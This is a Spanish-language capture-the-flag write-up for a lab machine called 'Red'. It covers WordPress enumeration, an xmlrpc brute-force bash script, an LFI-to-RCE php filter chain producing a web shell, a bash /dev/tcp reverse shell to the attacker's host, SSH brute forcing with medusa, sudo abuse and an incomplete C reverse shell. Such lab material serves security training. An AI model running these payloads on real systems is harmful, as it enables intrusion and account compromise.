Red 1 - Writeup
Dh89Table of contents
Skills
- Virtual Hosting
- Fuzzing
- xmlrpc | Wordpress enum
- php filterchaing LFI -> RCE
- mysql enum database
- Lateral movement | Abusing time SUDO
- Abusing cron tab | Privilage escalation
Reconocimiento
Para comenzar, como siempre vamos a crearnos nuestros directorios de trabajo
$ mkdir Red
$ cd Red
$ mkdir nmap content exploit
ls
content exploit nmap
Luego vamos a proceder a escanear los servicios que se exponen atravez de los puertos de la maquina.
$ sudo nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 192.168.0.9 -oN Allports
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.93 ( https://nmap.org ) at 2025-06-28 09:42 -03
Initiating ARP Ping Scan at 09:42
Scanning 192.168.0.9 [1 port]
Completed ARP Ping Scan at 09:42, 0.12s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 09:42
Scanning 192.168.0.9 [65535 ports]
Discovered open port 22/tcp on 192.168.0.9
Discovered open port 80/tcp on 192.168.0.9
Completed SYN Stealth Scan at 09:42, 6.15s elapsed (65535 total ports)
Nmap scan report for 192.168.0.9
Host is up, received arp-response (0.0054s latency).
Scanned at 2025-06-28 09:42:21 -03 for 6s
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: D8:F3:BC:4D:AC:A3 (Liteon Technology)
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 6.37 seconds
Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)
Como vemos, el puerto 22 y 80 estan abiertos, los cuales indican ssh y http que seguramente sea una web.
Vamos a utilzar la herramienta whatweb para ver que nos reporta.
$ whatweb 192.168.0.9
whatweb 192.168.0.9
http://192.168.0.9 [200 OK] Apache[2.4.41], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[192.168.0.9], MetaGenerator[WordPress 5.8.1], PoweredBy[--], Script, Title[Hacked By Red – Your site has been Hacked! You’ll never find the backdoor hahahah], UncommonHeaders[link], WordPress[5.8.1]
Vemos que hay un worpress por detras, y un titulo algo llamativo.
Vamos a hecharle un vistazo a la web para ver como se ve.
Vemos una pagina que parece algo basica, pero si miramos el codigo fuente encontramos lo siguiente.
Encontramos multiples entradas de un dominio, redrocks.win, esto quiere decir, que quizas se este aplicando virtualhosting, para que nuestra maquina resuelva a esta direccion, hay que agregar la IP y el dominio a nuestro “/etc/hosts“.
$ cat /etc/hosts
127.0.0.1 localhost
::1 localhost ip6-localhost ip6-loopback
fe00:: ip6-localnet
ff00:: ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
127.0.0.1 exegol-default
$ echo "192.168.0.9 redrocks.win" >> /etc/hosts
$ cat /etc/hosts
127.0.0.1 localhost
::1 localhost ip6-localhost ip6-loopback
fe00:: ip6-localnet
ff00:: ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
127.0.0.1 exegol-default
192.168.0.9 redrocks.win
Ahora veamos nuevamente la pagina.
Como podemos observar, la pagina ahora si nos carga correctamente.
Vamos a realizar un poco de fuzzing para ver que directorios o archivos interesantes nos encontramos.
$ ffuf -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.0.9/FUZZ -t 10
rss [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 121ms]
login [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 101ms]
feed [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 69ms]
0 [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 158ms]
atom [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 112ms]
wp-content [Status: 301, Size: 315, Words: 20, Lines: 10, Duration: 11ms]
admin [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 108ms]
rss2 [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 127ms]
wp-includes [Status: 301, Size: 316, Words: 20, Lines: 10, Duration: 4ms]
rdf [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 149ms]
page1 [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 118ms]
' [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 105ms]
dashboard [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 97ms]
%20 [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 103ms]
Vemos muchos directorios, entre ellos un login y un wp-content, admin.
Vamos a ir revisando para ver que cosas interesantes nos encontramos.
Luego de revisar, nos encontramos que la mayoria nos redirige al login de wp-content y el resto nos descarga una extructura xml que dice lo siguiente
<?xml version="1.0" encoding="UTF-8"?><feed
xmlns="http://www.w3.org/2005/Atom"
xmlns:thr="http://purl.org/syndication/thread/1.0"
xml:lang="en-US"
xml:base="http://redrocks.win/wp-atom.php"
>
<title type="text">Hacked By Red</title>
<subtitle type="text">Your site has been Hacked! You’ll never find the backdoor hahahah </subtitle>
<updated>2021-10-31T20:13:59Z</updated>
<link rel="alternate" type="text/html" href="http://redrocks.win" />
<id>http://redrocks.win/feed/atom/</id>
<link rel="self" type="application/atom+xml" href="http://redrocks.win/feed/atom/" />
<generator uri="https://wordpress.org/" version="5.8.1">WordPress</generator>
<entry>
<author>
<name>administrator</name>
<uri>http://10.0.2.20</uri>
</author>
<title type="html"><![CDATA[Hello Blue!]]></title>
<link rel="alternate" type="text/html" href="http://redrocks.win/2021/10/24/hello-world/" />
<id>http://10.0.2.20/?p=1</id>
<updated>2021-10-31T20:13:59Z</updated>
<published>2021-10-24T14:32:37Z</published>
<category scheme="http://redrocks.win" term="Uncategorized" />
<summary type="html"><![CDATA[Red was here, Blue is a loser!]]></summary>
<content type="html" xml:base="http://redrocks.win/2021/10/24/hello-world/"><![CDATA[<p>Red was here, Blue is a loser!</p>
<p><!-- Still Looking For It? Maybe you should ask Mr. Miessler for help, not that it matters, you won't be able to read anything with it anyway --></p>
]]></content>
<link rel="replies" type="text/html" href="http://redrocks.win/2021/10/24/hello-world/#comments" thr:count="1" />
<link rel="replies" type="application/atom+xml" href="http://redrocks.win/2021/10/24/hello-world/feed/atom/" thr:count="1" />
<thr:total>1</thr:total>
</entry>
</feed>
Parece que existe un backdoor que podriamos utilizar para ganar acceso.
Luego de mirar un poco me encuentro un hiperviculo en un post de la pagina
La cual lleva a otra IP, sobre /wp-admin.
El cual me redirigue al tipico panel admin de worpress, lo unico que puedo comprobar es que existe el usuario administrator, debido a que devuelve una respuesta direfente.
Luego de seguir investigando me encuentro con lo siguiente.
El xmlrpc.php de los Worpress, esto sirve para enviar peticiones xml, quizas podamos estraer alguna informacion.
Intercepto la peticion con burpsuite y le doy a cambiar tipo de peticion, para tramitarlo por POST.
Enviando lo siguiente
<?xml version="1.0" encoding="utf-8"?>
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>
Una estructura basica, que nos permite listar todos los metodos que podemos utilizar.
Podemos intentar realizar fuerza bruta utilizando el metodo wp.getUsersBlogs (Se pueden utilizar otros metodos tambien como wp.getCategories o metaWeblog.getUsersBlogs)
Yo voy a utilizar un script en bash.
#!/usr/bin/bash
function ctrl_c(){
echo -e "\n\n[!]Saliendo...\n"
tput cnorm; exit 1
}
tput civis
function createXML(){
password=$1
xmlfile="""
<?xml version=\"1.0\" encoding=\"UTF-8\"?>
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>administrator</value></param>
<param><value>$password</value></param>
</params>
</methodCall>
"""
echo $xmlfile > file.xml
response=$(curl -s -X POST http://192.168.0.14:/xmlrpc.php -d@file.xml)
if [ ! "$(echo $response | grep 'Incorrect username or password')" ]; then
echo -e "\n La password para el usuario administrator es $password"
tput cnorm
exit 1
fi
}
# Ctrl_c
trap ctrl_c SIGINT
cat /usr/share/wordlists/rockyou.txt | while read password; do
createXML $password
tput cnorm
done
Probando varios diccionarios, no logro dar con la contraseña del administrador.
Mirando la ruta http://redrocks.win/wp-json/wp/v2/users, podemos observar una lista de usuarios disponibles, donde podemos confirmar que solo existe el user administrator.
Haciendo Fuzzing por extenciones .php veo que obtengo un internal server error
ffuf -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/CommonBackdoors-PHP.fuzz.txt -u http://192.168.0.14/FUZZ -t 40 -fl 10
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://192.168.0.14/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/CommonBackdoors-PHP.fuzz.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response lines: 10
________________________________________________
NetworkFileManagerPHP.php [Status: 500, Size: 0, Words: 1, Lines: 1, Duration: 5807ms]
Normalmente los backdoor suelen ser del siguiente estilo: ejemplo.php?var=<comando>, por tanto ahora nos toca buscar esa variable.
Luego de varios intentos, debido a que al usar hilos o enviar multiples peticiones por mucho tiempo la maquina se colgaba, logro descubrir la variable key.
La url quedaria de la siguiente manera http://redrocks.win/NetworkFileManagerPHP.php?key
Intento ejecutar comandos, pero no me deja, hasta que pruebo apuntar un archivo y veo lo siguiente.
Por tanto, parece que tenemos un lfi (Local File Inclusion), vamos a listar.
Para ganar acesso directamente voy a utilizar de php filter chain.
Esta tecnia podria tener su poprio capitulo aparte de explicar como funciona, voy a explicarlo en resumen y si quieren, en un futuro doy una explicacion mas profunda.
Basicamente consiste en abusar en la forma de como se representan los datos en unicode segun que tipo de codificacion se utilize (ejemplo UTF-8, UTF-7, etc.)
Lo interesante aqui es que podemos ir cambiando sobre los tipos de codificacion para ir representando en la web lo que queremos, en este caso yo voy a representar una web shell sencilla de php <? php echo shell_exec($_GET[cmd])"; ?>, donde utilizamos la variable cmd, para ejecutar el comando deado.
Para hallar la sucesion de conversiones que necesito, utilizare el siguiente proyecto → php_filter_chain
El payload quedaria de la siguiente forma:
python3 php_filter_chain_generator.py --chain '<?php echo shell_exec($_GET['cmd']); ?>'
[+] The following gadget chain will generate the following code : <?php echo shell_exec($_GET[cmd]); ?> (base64 value: PD9waHAgZWNobyBzaGVsbF9leGVjKCRfR0VUW2NtZF0pOyA/Pg)
php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.UCS2.UTF-8|convert.iconv.CSISOLATIN6.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSA_T500.UTF-32|convert.iconv.CP857.ISO-2022-JP-3|convert.iconv.ISO2022JP2.CP775|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM891.CSUNICODE|convert.iconv.ISO8859-14.ISO6937|convert.iconv.BIG-FIVE.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT_JISX0213|convert.iconv.UHC.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.864.UTF32|convert.iconv.IBM912.NAPLPS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP869.UTF-32|convert.iconv.MACUK.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP949.UTF32BE|convert.iconv.ISO_69372.CSIBM921|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.863.UTF-16|convert.iconv.ISO6937.UTF16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.iconv.CP950.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UTF16.EUC-JP-MS|convert.iconv.ISO-8859-1.ISO_6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT_JISX0213|convert.iconv.UHC.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-4LE.OSF05010001|convert.iconv.IBM912.UTF-16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP869.UTF-32|convert.iconv.MACUK.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp
El cual si pegamos en la web y agregamos &cmd=<comando> al final, nos ejecuta el comando.
En este caso, puse whoami y vemos www-data, por tanto tenemos ejecucion de comandos, vamos a recibir una consola con pwncat.
En lugar de whoami, la siguiente linea bash -c "bash -i >%26 /dev/tcp/192.168.0.8/4443 0>%261".
pwncat-cs :4443
[17:27:33] Welcome to pwncat 🐈! __main__.py:164
[17:27:35] received connection from 192.168.0.14:42536 bind.py:84
[17:27:37] 192.168.0.14:42536: registered new host w/ db
Pwncat es una herramienta bastante fuerte, para transferir archivos y moverse entre tu maquina atacante y la victima entre otras cosas.
Escalada de Privilegios.
Ahora toca enumerar el sistema para ver que encontramos.
Revisando la ruta /var/www/wordpress, me ecuentro con el archivo de configuracion.
ls
%26 license.txt wp-comments-post.php wp-includes wp-settings.php
%261 readme.html wp-config-sample.php wp-links-opml.php wp-signup.php
'%261'$'\n' wp-activate.php wp-config.php wp-load.php wp-trackback.php
NetworkFileManagerPHP.php wp-admin wp-content wp-login.php xmlrpc.php
index.php wp-blog-header.php wp-cron.php wp-mail.php
El cual contiene las siguientes credenciales:
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the installation.
* You don't have to use the web site, you can copy this file to "wp-config.php"
* and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://wordpress.org/support/article/editing-wp-config-php/
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );
/** MySQL database username */
define( 'DB_USER', 'john' );
/** MySQL database password */
define( 'DB_PASSWORD', 'R3v_m4lwh3r3_k1nG!!' );
El usuario existe, por tanto voy a intentar conectarme por ssh, para ver si funciona.
Pero no, no funciona, vamos a intentar conectarnos al MYSQL para ver que encontramos
mysql -u john -p
Enter password: # R3v_m4lwh3r3_k1nG!!
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 4906
Server version: 8.0.26-0ubuntu0.20.04.3 (Ubuntu)
Copyright (c) 2000, 2021, Oracle and/or its affiliates.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql>
show databases();
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '()' at line 1
mysql> You will never win Blue
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| wordpress |
+--------------------+
2 rows in set (0.14 sec)
mysql> use wordpress
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
+-----------------------+
| Tables_in_wordpress |
+-----------------------+
| wp_commentmeta |
| wp_comments |
| wp_links |
| wp_options |
| wp_postmeta |
| wp_posts |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_termmeta |
| wp_terms |
| wp_usermeta |
| wp_users |
+-----------------------+
12 rows in set (0.00 sec)
mysql> select * from wp_users;
+----+---------------+------------------------------------+---------------+---------------+------------------+---------------------+---------------------+-------------+---------------+
| ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name |
+----+---------------+------------------------------------+---------------+---------------+------------------+---------------------+---------------------+-------------+---------------+
| 1 | administrator | $P$BHts8T4UWtFsg2Od/BqoFMxZoktTsq. | administrator | red@rocks.com | http://10.0.2.20 | 2021-10-24 14:32:37 | | 0 | administrator |
+----+---------------+------------------------------------+---------------+---------------+------------------+---------------------+---------------------+-------------+---------------+
1 row in set (0.00 sec)
Tenemos la clave del administrador, pero parece estar cifrada. Podriamos intentar romperla, pero como ya hicimos fuerza bruta desde antes, no creo que valga la pena.
Luego de varios intentos, se me ocurrio hacer una lista de variaciones con la pass que tenemos, esto lo podemos hacer con hascat.
hashcat --stdout pass -r /usr/share/hashcat/rules/best64.rule
R3v_m4lwh3r3_k1nG!!
!!Gn1k_3r3hwl4m_v3R
R3V_M4LWH3R3_K1NG!!
r3v_m4lwh3r3_k1nG!!
R3v_m4lwh3r3_k1nG!!0
R3v_m4lwh3r3_k1nG!!1
R3v_m4lwh3r3_k1nG!!2
R3v_m4lwh3r3_k1nG!!3
R3v_m4lwh3r3_k1nG!!4
R3v_m4lwh3r3_k1nG!!5
R3v_m4lwh3r3_k1nG!!6
R3v_m4lwh3r3_k1nG!!7
R3v_m4lwh3r3_k1nG!!8
R3v_m4lwh3r3_k1nG!!9
R3v_m4lwh3r3_k1nG!!00
R3v_m4lwh3r3_k1nG!!01
R3v_m4lwh3r3_k1nG!!02
R3v_m4lwh3r3_k1nG!!11
R3v_m4lwh3r3_k1nG!!12
R3v_m4lwh3r3_k1nG!!13
R3v_m4lwh3r3_k1nG!!21
R3v_m4lwh3r3_k1nG!!22
R3v_m4lwh3r3_k1nG!!23
R3v_m4lwh3r3_k1nG!!69
R3v_m4lwh3r3_k1nG!!77
R3v_m4lwh3r3_k1nG!!88
R3v_m4lwh3r3_k1nG!!99
R3v_m4lwh3r3_k1nG!!123
R3v_m4lwh3r3_k1nG!!e
R3v_m4lwh3r3_k1nG!!s
R3v_m4lwh3r3_k1nG!a
R3v_m4lwh3r3_k1nGs
R3v_m4lwh3r3_k1nGa
R3v_m4lwh3r3_k1nGer
R3v_m4lwh3r3_k1nGie
R3v_m4lwh3r3_k1no
R3v_m4lwh3r3_k1ny
R3v_m4lwh3r3_k1n123
R3v_m4lwh3r3_k1nman
R3v_m4lwh3r3_k1ndog
1R3v_m4lwh3r3_k1nG!!
theR3v_m4lwh3r3_k1nG!!
d3v_m4lwh3r3_k1nG!!
mav_m4lwh3r3_k1nG!!
R3v_m4lwh3r3_k1nG!!
R3v_m4lwh3r3_k1nG!!
R3v_m4lwh3r3_k1nG!!
R3_m4lwh3r3_k1nG!!
R3m4lwh3r3_k1nG!!
R3vm4lwh3r3_k1nG!!
R3v_4lwh3r3_k1nG!!
R3vm
R3v_m1
R3v_m4lwh3r3_k1nG!
R3v_m4lwh3r3_k1nG
R3v_m4lwh3r3_k1n
R3v_m4lwh3r3_k1nR3v_m4lwh3r3_k1n
Rv_m4lwh3r3_k1n
1nG!
h3r3_k1nG!!v_m4lw
R3v_m4lwh3r3_k1n!
3v_m4lwh3r3_k1nG
G!!R3v_m4lwh3r3_k1n
nG!!
1nG!!
k1nGk1nG
n3v_
_mR_mR
Z3v_m4lwh3r3_k1nG!!
U_m4lwh3r3_k1nG!!
R3v_lw
R3vmR3vm
_mR
R3r3R3r3
Rrlw
R3v_ml
R4lwh3
Simplemente lo copiamos y pegamos en un archivo, y probamos por los usuario que disponemos.
Luego de un rato vemos lo siguiente.
medusa -M ssh -h 192.168.0.14 -u john -P passwords
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
ACCOUNT CHECK: [ssh] Host: 192.168.0.14 (1 of 1, 0 complete) User: john (1 of 1, 0 complete) Password: R3v_m4lwh3r3_k1nG!! (1 of 77 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.0.14 (1 of 1, 0 complete) User: john (1 of 1, 0 complete) Password: !!Gn1k_3r3hwl4m_v3R (2 of 77 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.0.14 (1 of 1, 0 complete) User: john (1 of 1, 0 complete) Password: R3V_M4LWH3R3_K1NG!! (3 of 77 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.0.14 (1 of 1, 0 complete) User: john (1 of 1, 0 complete) Password: r3v_m4lwh3r3_k1nG!! (4 of 77 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.0.14 (1 of 1, 0 complete) User: john (1 of 1, 0 complete) Password: R3v_m4lwh3r3_k1nG!!0 (5 of 77 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.0.14 User: john Password: R3v_m4lwh3r3_k1nG!!0 [SUCCESS]
La pass parece ser R3v_m4lwh3r3_k1nG!!0, voy a conectarme por ssh para ver si funciona.
ssh john@192.168.0.14
john@192.168.0.14's password:
Last login: Wed Oct 27 02:05:25 2021 from 10.0.2.15
john@red:~$
Al ganar acceso como john, realizo un sudo -l para ver si tengo algun permiso.
sudo -l
Matching Defaults entries for john on red:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User john may run the following commands on red:
(ippsec) NOPASSWD: /usr/bin/time
Esto es sencillo, podemos utilizar la pagina → gtfobins y buscar por time para hacer un movimiento lateral a ippsec.
Otra cosa que tiene esta maquina es que cada tanto te saca del servidor y no puedes usar cat para leer los archivos. Tambien nos imprime algunos mensajes por consola para molestar
Por tanto utilize less y luego me toco nueva mente utilizar medusa para encontrar la pass, luego rapidamente, convertirnos en ippsec.
sudo -u ippsec /usr/bin/time /bin/sh
$ bash
ippsec@red:/home/john$
Se me da por listar los archivos que tengo permitido como grupo.
ippsec@red:~$ find / -group ippsec 2>/dev/null | grep -v "/proc"
/var/www/wordpress/.git
/home/ippsec
/home/ippsec/.bash_logout
/home/ippsec/.profile
/home/ippsec/.bashrc
/home/ippsec/user.txt
Veo un .git algo raro, su contenido es lo siguiente.
ls -la
total 32
drwxrwx--- 2 root ippsec 4096 Jul 22 20:56 .
drwxr-xr-x 6 www-data www-data 4096 Jul 21 20:26 ..
-rwxr-xr-x 1 root root 16712 Jul 22 20:56 rev
-rw-r--r-- 1 root root 123 Oct 31 2021 supersecretfileuc.c
#include <stdio.h>
int main()
{
// prints hello world
printf("Get out of here Blue!\n");
return 0;
}
Ese es el contenido de arriba de supersecretfileuc.c, ese comentario me suena verlo por consola.
Por tanto me da a entender que quizas se este ejecutando cada cierto tiempo.
Debido a que esta compilado, podria intentar modificar su condenido y compilarlo con el mismo nombre para que me envie una shell, para ver como que usuario lo esta ejecutando.
Simplemente podemos utilizar la pagina → Online-Revershell, para crear nuestro payload.
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>
int main(void){
int port = 4443;
